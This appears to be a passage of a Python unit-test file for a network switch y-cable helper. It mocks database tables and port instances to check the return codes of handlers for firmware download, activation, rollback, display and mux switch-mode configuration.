@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_firmware_roll_cmd_arg_tbl_notification_no_port(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """Physical-port lookup unpatched: rollback handler reports failure with -1."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"rollback_firmware": "null"}
    rc = handle_config_firmware_roll_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port)
    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_firmware_roll_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
    """No port/instance patching at all: rollback handler reports failure with -1."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"rollback_firmware": "null"}
    rc = handle_config_firmware_roll_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port)
    assert rc == -1
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_firmware_roll_cmd_arg_tbl_notification_with_instance(self, port_instance, mock_swsscommon_table):
    """Physical port and instances patched: rollback handler completes, returns None."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"rollback_firmware": "null"}
    rc = handle_config_firmware_roll_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port)
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_firmware_roll_cmd_arg_tbl_notification_no_port_and_instance(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """Neither physical port nor instance resolvable: rollback handler returns -1."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"rollback_firmware": "null"}
    rc = handle_config_firmware_roll_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port)
    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_down_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
    """Physical-port lookup unpatched: download handler reports failure with -1."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    task_download_firmware_thread = {}
    port = "Ethernet0"
    fvp = {"download_firmware": "null"}
    rc = handle_config_firmware_down_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port, task_download_firmware_thread)
    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_down_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
    """An unrecognized fvp key drives the handler's else branch; it returns None."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    task_download_firmware_thread = {}
    port = "Ethernet0"
    # key deliberately misspelled ("downoad") so the handler does NOT match
    # "download_firmware" and takes its else branch
    fvp = {"downoad_firmware": "null"}
    rc = handle_config_firmware_down_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port, task_download_firmware_thread)
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('threading.Thread')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_down_cmd_arg_tbl_notification_with_instance(self, port_instance, mock_swsscommon_table, port_instance_helper, thread_obj):
    """Port, instance and threading all mocked: download handler completes, returns None.

    threading.Thread is patched (thread_obj), so no real download thread starts.
    """
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    task_download_firmware_thread = {}
    port = "Ethernet0"
    fvp = {"download_firmware": "null"}
    rc = handle_config_firmware_down_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port, task_download_firmware_thread)
    assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_down_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
    """Port-instance lookup unpatched: download handler reports failure with -1."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    task_download_firmware_thread = {}
    port = "Ethernet0"
    fvp = {"download_firmware": "null"}
    rc = handle_config_firmware_down_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port, task_download_firmware_thread)
    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_acti_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
    """Physical-port lookup unpatched: activate handler reports failure with -1."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    xcvrd_acti_fw_cmd_arg_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"activate_firmware": "null"}
    rc = handle_config_firmware_acti_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_acti_fw_cmd_arg_tbl, asic_index, port)
    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_acti_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
    """An fvp key other than "activate_firmware" drives the else branch; returns None."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    xcvrd_acti_fw_cmd_arg_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    # wrong key on purpose: the handler should ignore it and take its else branch
    fvp = {"down_firmware": "null"}
    rc = handle_config_firmware_acti_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_acti_fw_cmd_arg_tbl, asic_index, port)
    assert rc is None
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "activate_firmware", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_config_firmware_acti_cmd_arg_tbl_notification_with_instance(self, port_instance, mock_swsscommon_table, port_instance_helper):
    """Port, instance and arg type "activate_firmware" all resolvable: handler returns None."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    xcvrd_acti_fw_cmd_arg_tbl = mock_swsscommon_table
    # NOTE(review): this local shadows the patched getter mock (the `port_instance`
    # parameter); the handler sees the patched mock's return_value instead -- confirm intent.
    port_instance = MagicMock()
    port_instance.activate_firmware = MagicMock(return_value=True)
    asic_index = 0
    port = "Ethernet0"
    fvp = {"activate_firmware": "null"}
    rc = handle_config_firmware_acti_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_acti_fw_cmd_arg_tbl, asic_index, port)
    assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_acti_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
    """Port-instance lookup unpatched: activate handler reports failure with -1."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    xcvrd_acti_fw_cmd_arg_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"activate_firmware": "null"}
    rc = handle_config_firmware_acti_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_acti_fw_cmd_arg_tbl, asic_index, port)
    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_firmware_show_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
    """Physical-port lookup unpatched: firmware-show handler reports failure with -1."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    xcvrd_show_fw_res_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"firmware_version": "null"}
    rc = handle_show_firmware_show_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_show_fw_res_tbl, asic_index, port)
    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_firmware_show_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
    """An fvp key other than "firmware_version" drives the else branch; returns None."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    xcvrd_show_fw_res_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    # wrong key on purpose: the handler should ignore it and take its else branch
    fvp = {"down_firmware": "null"}
    rc = handle_show_firmware_show_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_show_fw_res_tbl, asic_index, port)
    assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "activate_firmware", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_show_firmware_show_cmd_arg_tbl_notification_with_instance(self, mock_swsscommon_table, platform_sfputil):
    """A stub port instance is served via y_cable_port_instances; handler returns None."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    xcvrd_show_fw_res_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    platform_sfputil.get_asic_id_for_logical_port = 0
    fvp = {"firmware_version": "null"}
    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
        class PortInstanceHelper():
            """Minimal stand-in for a y-cable port instance object."""
            def __init__(self):
                self.EEPROM_ERROR = -1
                self.TARGET_NIC = 1
                self.TARGET_TOR_A = 1
                self.TARGET_TOR_B = 1
                self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                self.download_firmware_status = 0
                self.SWITCH_COUNT_MANUAL = "manual"
                self.SWITCH_COUNT_AUTO = "auto"
            def get_read_side(self):
                return 1
            # Defining function without self argument creates an exception,
            # which is what we want for this test.
            def get_mux_direction():
                pass
        patched_util.get.return_value = PortInstanceHelper()
        rc = handle_show_firmware_show_cmd_arg_tbl_notification(
            fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_show_fw_res_tbl, asic_index, port)
        assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_firmware_show_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
    """Port-instance lookup unpatched: firmware-show handler reports failure with -1."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
    xcvrd_show_fw_res_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"firmware_version": "null"}
    rc = handle_show_firmware_show_cmd_arg_tbl_notification(
        fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, xcvrd_show_fw_res_tbl, asic_index, port)
    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_mux_switchmode_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
    """Physical-port lookup unpatched: switchmode handler reports failure with -1."""
    mock_table = MagicMock()
    mock_swsscommon_table.return_value = mock_table
    xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"config": "null"}
    rc = handle_config_mux_switchmode_arg_tbl_notification(
        fvp, xcvrd_config_hwmode_swmode_cmd_sts_tbl, xcvrd_config_hwmode_swmode_rsp_tbl, asic_index, port)
    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_mux_switchmode_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
    """Expect None when fvp carries an unrelated key ('down_firmware'), hitting the handler's else branch."""
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"down_firmware": "null"}

    rc = handle_config_mux_switchmode_arg_tbl_notification(
        fvp, xcvrd_config_hwmode_swmode_cmd_sts_tbl, xcvrd_config_hwmode_swmode_rsp_tbl, asic_index, port)

    assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "activate_firmware", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_config_mux_switchmode_cmd_arg_tbl_notification_with_instance_manual(self, platform_sfputil, mock_swsscommon_table):
    """Expect None (success) when configuring 'manual' switch mode with a mocked port instance."""
    # NOTE: @patch args are injected bottom-up, so the sfputil mock arrives
    # before the Table mock; the original signature had the two names swapped.
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    platform_sfputil.get_asic_id_for_logical_port = 0
    fvp = {"config": "manual"}

    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:

        class PortInstanceHelper():
            """Minimal stand-in for a y-cable port instance object."""

            def __init__(self):
                self.EEPROM_ERROR = -1
                self.TARGET_NIC = 1
                self.TARGET_TOR_A = 1
                self.TARGET_TOR_B = 1
                self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                self.download_firmware_status = 0
                self.SWITCH_COUNT_MANUAL = "manual"
                self.SWITCH_COUNT_AUTO = "auto"
                self.SWITCHING_MODE_MANUAL = "manual"

            def get_read_side(self):
                return 1

            def set_switching_mode(self, mode):
                return True

            # Defining function without self argument creates an exception,
            # which is what we want for this test.
            def get_mux_direction():
                pass

        patched_util.get.return_value = PortInstanceHelper()
        rc = handle_config_mux_switchmode_arg_tbl_notification(
            fvp, xcvrd_config_hwmode_swmode_cmd_sts_tbl, xcvrd_config_hwmode_swmode_rsp_tbl, asic_index, port)
        assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_mux_switchmode_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
    """Expect -1 from the config-switchmode handler when no y-cable port instance is patched in."""
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"config": "manual"}

    rc = handle_config_mux_switchmode_arg_tbl_notification(
        fvp, xcvrd_config_hwmode_swmode_cmd_sts_tbl, xcvrd_config_hwmode_swmode_rsp_tbl, asic_index, port)

    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "activate_firmware", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_config_mux_switchmode_cmd_arg_tbl_notification_with_instance_auto(self, platform_sfputil, mock_swsscommon_table):
    """Expect None (success) when configuring 'auto' switch mode with a mocked port instance."""
    # NOTE: @patch args are injected bottom-up, so the sfputil mock arrives
    # before the Table mock; the original signature had the two names swapped.
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_config_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_config_hwmode_swmode_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    platform_sfputil.get_asic_id_for_logical_port = 0
    fvp = {"config": "auto"}

    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:

        class PortInstanceHelper():
            """Minimal stand-in for a y-cable port instance object."""

            def __init__(self):
                self.EEPROM_ERROR = -1
                self.TARGET_NIC = 1
                self.TARGET_TOR_A = 1
                self.TARGET_TOR_B = 1
                self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                self.download_firmware_status = 0
                self.SWITCH_COUNT_MANUAL = "manual"
                self.SWITCH_COUNT_AUTO = "auto"
                self.SWITCHING_MODE_MANUAL = "manual"
                self.SWITCHING_MODE_AUTO = "auto"

            def get_read_side(self):
                return 1

            def set_switching_mode(self, mode):
                return True

            # Defining function without self argument creates an exception,
            # which is what we want for this test.
            def get_mux_direction():
                pass

        patched_util.get.return_value = PortInstanceHelper()
        rc = handle_config_mux_switchmode_arg_tbl_notification(
            fvp, xcvrd_config_hwmode_swmode_cmd_sts_tbl, xcvrd_config_hwmode_swmode_rsp_tbl, asic_index, port)
        assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_mux_switchmode_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
    """Expect -1 from the show-switchmode handler in the no-port scenario.

    Note: the physical-port lookup helper is deliberately NOT patched here.
    """
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_show_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_swmode_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"state": "null"}

    rc = handle_show_hwmode_swmode_cmd_arg_tbl_notification(
        fvp, xcvrd_show_hwmode_swmode_cmd_sts_tbl, xcvrd_show_hwmode_swmode_rsp_tbl, asic_index, port)

    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
